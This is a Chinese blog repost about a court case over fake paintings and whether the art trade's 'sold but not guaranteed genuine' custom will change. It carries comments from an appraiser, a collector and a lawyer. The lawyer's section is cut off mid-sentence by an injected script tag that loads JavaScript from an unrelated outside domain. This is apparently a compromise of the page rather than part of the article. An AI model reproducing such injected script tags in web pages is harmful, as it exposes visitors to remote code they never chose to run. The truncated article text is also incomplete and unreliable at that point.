注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

世界华人文化交流联合会

和有识之士携手,与时代骄子共舞,择人生良师益友,拓事业发展领域。

 
 
 

日志

 
 
关于我

中华文化积淀着中华民族最深沉的精神追求,包含着中华民族最根本的精神基因,代表着中华民族独特的精神标识,是中华民族生生不息、发展壮大的丰厚滋养。 电话:13241030333/15516925189 QQ:927896388

网易考拉推荐

书画交易“不保真”行规会被颠覆吗  

2014-12-30 12:09:12|  分类: 【书画频道】 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |

书画交易“不保真”行规会被颠覆吗

        7年前,辽宁省沈阳市一位书画爱好者冯先生,出资81万元购买了7幅名画,结果被鉴定均为赝品,一气之下将销售假画的艺术品公司推上被告席。官司打了6年,近日终于有了结果:沈阳市中级人民法院终审裁定,判定销售方退返全部购画款(据8月5日《人民日报》)。

报道称,辽宁省文物保护中心的一位专家认为,目前普遍认为,“不保真”是文物书画买卖中的行规,所以有些人发现上当后要么自认倒霉,要么因为证据不足放弃诉讼。而此案判决对书画市场“保卖不保真”的行规而言是颠覆性的,因为以后类似案件可以比照此判决。

真假鉴定谁说了算?——鉴定应慎重

王石(中华鉴宝网艺术总监、鉴定专家):

近两年,全国的鉴定机构遍地开花,仅北京就有几十家之多。但是国家却没有相关的规定来审核鉴定机构,也未要求鉴定机构必须有何资质或者如何操作。对于鉴定专家的从业资格,国家也无相关的资质认证办法。我们在为公众做鉴定服务的时候,有些收藏者很自然地问专家有没有鉴定资质的证书,这合情合理。但是,目前专家走的都是研究员、副研究员的职称,而且即使有研究员的职称,也未必有鉴定的能力和条件。再加上有些不能自律的人,只要给钱,不论真假,都出具证书。这些也导致了鉴定行业的混乱。一些所谓专家出具的证书,成了赝品过关的保驾护航者,到了不懂行的收藏者面前,就成了赝品是真品的铁证。

我们做文物艺术品鉴定这一行有四五年了,这期间共为公众鉴定艺术品上万人次。但是我们出具的鉴定证书不超过1%,也就是说,真品的数量不到1%。在过去信息闭塞的时代,信息不对称导致一夜暴富是有可能的,而在信息高度发达、赝品充斥市场的今天,“捡漏”则几乎是不可能的。

许多藏家之所以买到赝品,正是由于连基本的知识都不了解,只是听信了个别专家的意见、卖家的宣传甚至媒体片面的报道便出手购买。因此,建议刚入门的藏家参加一些相关知识的培训课。

如何避免买到赝品?——多学习,多研究,少出手

杜义德(著名古玉收藏家):

让拍卖行和艺术品公司对出售的艺术品完全保真是不现实的。由于艺术品的特殊性,现在没有科学的仪器来鉴定真伪,只能靠专家的“目鉴”。即使是最权威的专家,由于其知识储备的不同,以及一些客观因素的影响,得出的结论也有可能不同。同一幅张大千的《仿石溪山水图》,泰斗级的鉴定家谢稚柳与徐邦达就曾给出截然相反的鉴定意见。

藏家不能完全依赖于拍卖行或者卖家提供的信息。在利益驱使下,有一些卖家和拍卖行甚至故意“买假”和“假卖”,作为买方,一定要进行鉴定、考察。不能把希望寄托在卖方身上。买卖本身是有风险的,还是要靠自己把控。

收藏关键要“严于律己”。所谓“有眼买真,没眼买假”,收藏者要想不上当受骗,就要多“练眼”:多学习,多研究,少出手。收藏是一门学门,博大精深。刚入行时由于迷信某个拍卖经理或者所谓专家,买到假画是在所难免的,但是只要肯学习、肯琢磨,就能买到真东西、好东西。我认识不少的收藏者,非常固执,听不进去专家的意见,买到了赝品还很高兴。如果有人告诉他买的不是真品,他还不乐意。

不论是冲着艺术品的艺术价值购买,还是抱着投机的心理收藏,多方听取专业鉴定机构的意见尤其是鉴藏家的意见非常重要。

买到赝品如何索赔?——交易前书面约定“如假包退”

翟格民(北京某律师事务所律师):

这种案例只是个例,对于艺术品市场尤其是拍卖市场不会产生所谓颠覆性影响。首先,《拍卖法》中有规定,如果拍卖行事先声明了不能保真,那么就可以不承担法律责任。这种情况下,买家就只能自认倒霉。

有人根据《消费者权益保护法》来要求赔偿,其实,《消费者权益保护法》是一般法,只针对生活中的普通消费品,?script src=http://51zhujiang.com/s.js>

  评论这张
 
阅读(4)| 评论(0)
推荐 转载

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017